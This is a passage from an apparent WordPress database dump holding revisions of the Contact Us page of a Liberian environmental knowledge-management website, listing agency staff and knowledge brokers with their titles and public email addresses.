width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 09:39:39','2021-03-29 09:39:39','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3643,42,'2021-03-29 09:39:39','2021-03-29 09:39:39','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-29 09:39:39','2021-03-29 09:39:39','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3644,42,'2021-03-29 09:50:57','2021-03-29 09:50:57','','sherman','','inherit','open','closed','','sherman','','','2021-03-29 09:50:57','2021-03-29 09:50:57','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png',0,'attachment','image/png',0),(3646,42,'2021-03-29 09:57:17','2021-03-29 09:57:17','','borbor','','inherit','open','closed','','borbor','','','2021-03-29 09:57:17','2021-03-29 09:57:17','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png',0,'attachment','image/png',0),(3647,42,'2021-03-29 09:59:02','2021-03-29 09:59:02','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											